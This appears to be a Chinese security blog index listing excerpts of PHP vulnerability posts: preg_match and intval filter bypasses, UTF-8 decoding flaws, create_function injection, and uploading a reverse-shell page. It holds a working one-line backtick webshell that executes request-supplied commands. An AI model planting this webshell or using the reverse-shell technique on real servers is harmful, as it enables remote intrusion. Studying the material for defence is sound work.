author: 80vul-B
team:http://www.80vul.com
date:2009-04-27
一 描叙
php手册里:
—————————————————————————————–
int preg_match ( string pattern, string subject [, array matches [, int flags]] )
在 subject 字符串中搜索与 pattern 给出的正则表达式相匹配的内容。
如果提供了 matches,则其会被搜索的结果所填充。$matches[0] 将包含与整个模式匹配的文本,$matches[1] 将包含与第一个捕获的括号中的子模式所匹配的文本,以此类推。
—————————————————————————————–
阅读全文 »
Tags: Discuz!,
PCH,
PHP,
preg_match(_all)
author: xy7#80sec.com
from:http://www.80vul.com/pch/
一 描叙
intval函数有个特性:”直到遇上数字或正负符号才开始做转换,再遇到非数字或字符串结束时(\0)结束转换”,在某些应用程序里由于对intval函数这个特性认识不够,错误的使用导致绕过一些安全判断导致安全漏洞.
阅读全文 »
Tags: intval(),
PCH,
PHP
作者:lcx
<?php
$conn=OCILogon("用户名","密码","(DESCRIPTION=(ADDRESS=(PROTOCOL =TCP)(HOST=IP)(PORT = 1521))(CONNECT_DATA =(SID=lcx)))");
阅读全文 »
Tags: Oracle,
PHP
作者:skyfire[B.H.S.T]
源码:
<?php
/*一个新型的php一句话cmdshell(非一句话木马)
//原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
//局限性:特征码比较明显,``符号在php中很少用到,杀毒软件很容易以此为特征码扫描到并警报;``里面不能执行php代码;
//write by skyfire
*/
echo `$_REQUEST[id]`;
?>
阅读全文 »
Tags: PHP,
WebShell
作者:Sh@doM
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。非常无奈,没想 到什么好的办法,后来灵光一闪。放一个php页面,里面 可以直接弹回来shell,何况在console下面操作比webshell方便的多,也不会出现超时之类的情况。
因为我不怎么懂php,于是就找了猥琐 的诺诺和小雨修改了一下代码,反弹代码是从phpspy2008里面提取的,但是不能直接用,需要修改成一个单独的php文件。上传之后,本地监听一个端 口,在代码里设置好反弹IP和端口,然后直接访问,就会弹回来一个shell。
阅读全文 »
Tags: PHP,
反弹
来源:Web安全手册
感谢无敌小黄瓜[BK瞬间群]的投递
支持gzdeflate、base64_encode、str_rot13的解密。
阅读全文 »
Tags: Decode,
PHP
来源:80sec
漏洞说明: php是一款被广泛使用的编程语言,可以被嵌套在html里用做web程序开发。但是在php里使用的某些编码函数在处理畸形的utf8序列时会产生不正确的结果,这样在某些情况下可能会引起应用程序的安全漏洞,绕过某些逻辑过滤等等。
漏洞成因:php在处理utf8编码时,对畸形的序列处理不当,如
阅读全文 »
Tags: Decode,
PHP,
UTF-8,
漏洞
php use create_function function to CREATE an anonymous function like below(stolen from php_manual):
————————————————–
Description
string create_function ( string args, string code )
Creates an anonymous function from the parameters passed, and returns a unique name for it. Usually the args will be passed as a single quote delimited string, and this is also recommended for the code. The reason for using single quoted strings, is to protect the variable names from parsing, otherwise, if you use double quotes there will be a need to escape the variable names, e.g. \$avar.
阅读全文 »
Tags: PHP,
Vulnerability